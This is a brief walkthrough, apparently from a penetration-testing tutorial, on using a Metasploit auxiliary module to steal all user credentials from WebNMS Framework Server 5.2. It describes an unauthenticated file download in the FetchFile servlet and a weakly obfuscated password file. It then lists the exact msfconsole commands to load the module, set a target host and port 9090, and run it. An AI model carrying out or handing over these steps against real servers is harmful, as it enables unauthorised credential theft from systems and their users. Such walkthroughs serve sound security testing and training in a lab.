This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract all user credentials. The first vulnerability is a unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user credentials. The second vulnerability is that the the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on windows and linux.
Exploit Targets
WebNMS Framework Server 5.2
Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2
Open Kali terminal type msfconsole
Now type use auxiliary/admin/http/webnms_cred_disclosure
msf exploit( webnms_cred_disclosure )> set rhost 192.168.0.103 (IP of Remote Host)
msf exploit( webnms_cred_disclosure )> set rport 9090
msf exploit( webnms_cred_disclosure )> exploit
